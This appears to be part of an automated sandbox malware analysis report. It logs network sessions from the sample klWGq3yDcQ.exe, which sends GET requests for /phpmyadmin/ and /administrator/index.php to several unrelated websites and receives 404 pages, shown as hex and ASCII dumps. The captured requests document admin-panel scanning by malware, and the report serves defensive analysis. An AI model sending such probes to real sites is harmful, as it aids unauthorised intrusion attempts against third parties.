                                                                                                                                                                                                    Data Ascii: 3FC0-border item-depth-5'><a href="https://www.maxiv.lu.se/beamlines-accelerators/support-labs/microscopy-labs/scanning-electron-microscope/user-information-sem/" class="menu-item-label">User information</a></li><li></li></ul></li><li class='menu-item m


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    121192.168.2.457546194.47.252.1154436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC176OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.maxiv.lu.se
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC534INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 33 20 47 4d 54 0d 0a 73 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 6c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not Founddate: Sun, 26 Nov 2023 05:59:33 GMTserver: Apache/2.4.57 (Debian)x-powered-by: PHP/8.2.12expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://www.maxiv.lu.se/wp-json/>; r
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC13086INData Raw: 33 33 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 4d 41 58 20 49 56 3c 2f 74 69 74
                                                                                                                                                                                                    Data Ascii: 3316<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; MAX IV</tit
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC16322INData Raw: 33 46 42 41 0d 0a 73 68 65 65 74 27 20 69 64 3d 27 6a 71 75 65 72 79 2d 75 69 2d 73 74 79 6c 65 73 2d 63 73 73 27 20 68 72 65 66 3d 27 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 75 69 2f 31 2e 31 33 2e 31 2f 74 68 65 6d 65 73 2f 62 61 73 65 2f 6a 71 75 65 72 79 2d 75 69 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 74 61 62 6c 65 70 72 65 73 73 2d 64 65 66 61 75 6c 74 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 74 61 62 6c 65 70 72 65 73 73 2f 63 73 73 2f 62 75 69 6c 64 2f 64 65 66 61 75 6c 74 2e 63
                                                                                                                                                                                                    Data Ascii: 3FBAsheet' id='jquery-ui-styles-css' href='//code.jquery.com/ui/1.13.1/themes/base/jquery-ui.css?ver=6.4.1' media='all' /><link rel='stylesheet' id='tablepress-default-css' href='https://www.maxiv.lu.se/wp-content/plugins/tablepress/css/build/default.c
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC70INData Raw: 34 30 0d 0a 32 2e 38 34 2d 33 34 2e 35 31 20 37 32 2e 34 35 2d 31 2e 34 32 20 31 2e 34 35 2d 32 2e 38 37 20 32 2e 38 39 2d 34 2e 33 35 20 34 2e 33 34 2d 31 39 2e 36 2d 31 36 2e 34 32 2d 34 32 2e 34 31 2d 0d 0a
                                                                                                                                                                                                    Data Ascii: 402.84-34.51 72.45-1.42 1.45-2.87 2.89-4.35 4.34-19.6-16.42-42.41-
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC16328INData Raw: 33 46 43 30 0d 0a 33 32 2e 33 36 2d 36 37 2e 34 38 2d 34 37 2e 31 39 7a 22 2f 3e 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 30 31 22 20 63 79 3d 22 34 35 30 22 20 72 3d 22 32 35 22 2f 3e 3c 2f 67 3e 3c 2f 73 79 6d 62 6f 6c 3e 3c 73 79 6d 62 6f 6c 20 69 64 3d 22 74 77 69 74 74 65 72 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 3e 3c 70 61 74 68 20 64 3d 22 4d 32 33 2e 39 35 34 20 34 2e 35 36 39 61 31 30 20 31 30 20 30 20 30 20 31 2d 32 2e 38 32 35 2e 37 37 35 20 34 2e 39 35 38 20 34 2e 39 35 38 20 30 20 30 20 30 20 32 2e 31 36 33 2d 32 2e 37 32 33 63 2d 2e 39 35 31 2e 35 35 35 2d 32 2e 30 30 35 2e 39 35 39 2d 33 2e 31 32 37 20 31 2e 31 38 34 61 34 2e 39 32 20 34 2e 39 32 20 30 20 30 20 30 2d 38 2e 33 38 34 20 34 2e 34 38 32 43 37 2e 36 39 31
                                                                                                                                                                                                    Data Ascii: 3FC032.36-67.48-47.19z"/><circle cx="501" cy="450" r="25"/></g></symbol><symbol id="twitter" viewBox="0 0 24 24"><path d="M23.954 4.569a10 10 0 0 1-2.825.775 4.958 4.958 0 0 0 2.163-2.723c-.951.555-2.005.959-3.127 1.184a4.92 4.92 0 0 0-8.384 4.482C7.691
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC16328INData Raw: 33 46 43 30 0d 0a 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 69 74 65 6d 2d 64 65 70 74 68 2d 33 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 75 73 65 72 2d 61 63 63 65 73 73 2f 73 61 66 65 74 79 2f 69 6e 2d 63 61 73 65 2d 6f 66 2d 65 6d 65 72 67 65 6e 63 79 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 49 6e 20 63 61 73 65 20 6f 66 20 65 6d 65 72 67 65 6e 63 79 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 69 74 65 6d 2d 64 65 70 74 68 2d 33 27 3e 3c 61 20 68
                                                                                                                                                                                                    Data Ascii: 3FC0enu-item-object-page item-depth-3'><a href="https://www.maxiv.lu.se/user-access/safety/in-case-of-emergency/" class="menu-item-label">In case of emergency</a></li><li class='menu-item menu-item-type-post_type menu-item-object-page item-depth-3'><a h
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC16328INData Raw: 33 46 43 30 0d 0a 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 20 69 74 65 6d 2d 64 65 70 74 68 2d 34 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 62 65 61 6d 6c 69 6e 65 73 2d 61 63 63 65 6c 65 72 61 74 6f 72 73 2f 62 65 61 6d 6c 69 6e 65 73 2f 62 6c 6f 63 68 2f 75 73 65 72 2d 69 6e 66 6f 72 6d 61 74 69 6f 6e 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 55 73 65 72 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3c 2f 61 3e 3c 73 70 61 6e 20 63 6c 61
                                                                                                                                                                                                    Data Ascii: 3FC0<li class='menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children item-depth-4'><a href="https://www.maxiv.lu.se/beamlines-accelerators/beamlines/bloch/user-information/" class="menu-item-label">User information</a><span cla
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC16312INData Raw: 33 46 42 30 0d 0a 72 61 79 2d 73 6f 75 72 63 65 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 58 2d 72 61 79 20 73 6f 75 72 63 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 20 69 74 65 6d 2d 64 65 70 74 68 2d 34 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 62 65 61 6d 6c 69 6e 65 73 2d 61 63 63 65 6c 65 72 61 74 6f 72 73 2f 62 65 61 6d 6c 69 6e 65 73 2f 66 6c 65 78 70 65 73 2f 65 78
                                                                                                                                                                                                    Data Ascii: 3FB0ray-source/" class="menu-item-label">X-ray source</a></li></ul></li><li class='menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children item-depth-4'><a href="https://www.maxiv.lu.se/beamlines-accelerators/beamlines/flexpes/ex
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC16328INData Raw: 33 46 43 30 0d 0a 61 74 65 72 69 61 6c 2d 69 63 6f 6e 20 73 75 62 6d 65 6e 75 2d 74 6f 67 67 6c 65 72 20 70 6c 75 73 2d 69 63 6f 6e 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 73 2d 73 68 61 72 70 22 3e 61 64 64 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 20 73 75 62 6d 65 6e 75 2d 74 6f 67 67 6c 65 72 20 64 2d 6e 6f 6e 65 20 6d 69 6e 75 73 2d 69 63 6f 6e 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 73 2d 73 68 61 72 70 22 3e 72 65 6d 6f 76 65 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 75
                                                                                                                                                                                                    Data Ascii: 3FC0aterial-icon submenu-toggler plus-icon" aria-hidden="true"><span class="material-icons-sharp">add</span></span><span class="material-icon submenu-toggler d-none minus-icon" aria-hidden="true"><span class="material-icons-sharp">remove</span></span><u
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC16328INData Raw: 33 46 43 30 0d 0a 69 6f 6e 2f 73 63 61 6e 6e 69 6e 67 2d 70 72 6f 62 65 2d 6d 69 63 72 6f 73 63 6f 70 65 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 4d 69 63 72 6f 73 63 6f 70 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 69 74 65 6d 2d 64 65 70 74 68 2d 36 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 62 65 61 6d 6c 69 6e 65 73 2d 61 63 63 65 6c 65 72 61 74 6f 72 73 2f 73 75 70 70 6f 72 74 2d 6c 61 62 73 2f 6d 69 63 72 6f 73 63 6f 70 79 2d 6c 61 62 73 2f 73 63 61 6e 6e 69 6e
                                                                                                                                                                                                    Data Ascii: 3FC0ion/scanning-probe-microscope/" class="menu-item-label">Microscope</a></li><li class='menu-item menu-item-type-post_type menu-item-object-page item-depth-6'><a href="https://www.maxiv.lu.se/beamlines-accelerators/support-labs/microscopy-labs/scannin


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    122192.168.2.45755034.149.87.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC238OUTGET /en/administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: www.dstaq.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.dstaq.com/en/administrator
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1079INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 38 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 36 30 30 0d 0a 58 2d 57 69 78 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 31 37 30 30 39 37 38 33 37 33 2e 34 30 34 31 30 33 32 38 35 38 31 30 34 36 37 35 31 34 38 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 53 65 72 76 65 72 3a 20 50 65 70 79 61 6b 61 2f 31 2e 31 39 2e 31 30
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Length: 2865Content-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1700978373.4041032858104675148Age: 0Cache-Control: no-cacheServer: Pepyaka/1.19.10
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC173INData Raw: 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d
                                                                                                                                                                                                    Data Ascii: ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1252INData Raw: 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                                                                                                                                                                                    Data Ascii: scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1252INData Raw: 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 69 31 38 6e 2f 61 6e 67 75 6c 61 72 2d 6c 6f 63 61 6c 65 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2f 31 2e 31 2e 31 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 73 63 72 69 70 74 73 2f 65
                                                                                                                                                                                                    Data Ascii: party/angularjs/1.2.28/i18n/angular-locale_en.js"></script><script src="//static.parastorage.com/services/third-party/angular-translate/1.1.1/angular-translate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719.0/scripts/e
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC188INData Raw: 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 21 2d 2d 20 65 6e 64 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: egardless, we recommend you to <a href="http://browsehappy.com/">update your browser.</a></span> </div> </div></div>... verification -->... end verification --></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    123192.168.2.45758134.149.87.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC236OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: www.2brospw.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.2brospw.com/administrator
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1085INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 36 30 30 0d 0a 58 2d 57 69 78 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 31 37 30 30 39 37 38 33 37 33 2e 34 32 37 31 30 33 36 33 33 38 32 39 31 33 37 39 30 32 35 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 53 65 72 76 65 72 3a 20 50 65 70 79 61 6b 61 2f 31 2e 31 39 2e 31 30 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1700978373.4271036338291379025Age: 0Cache-Control: no-cacheServer: Pepyaka/1.19.10X-Content-Type-Optio
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC167INData Raw: 62 33 31 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61
                                                                                                                                                                                                    Data Ascii: b31 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-sca
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1252INData Raw: 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c
                                                                                                                                                                                                    Data Ascii: le=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1252INData Raw: 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 69 31 38 6e 2f 61 6e 67 75 6c 61 72 2d 6c 6f 63 61 6c 65 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2f 31 2e 31 2e 31 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e
                                                                                                                                                                                                    Data Ascii: ices/third-party/angularjs/1.2.28/i18n/angular-locale_en.js"></script><script src="//static.parastorage.com/services/third-party/angular-translate/1.1.1/angular-translate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719.
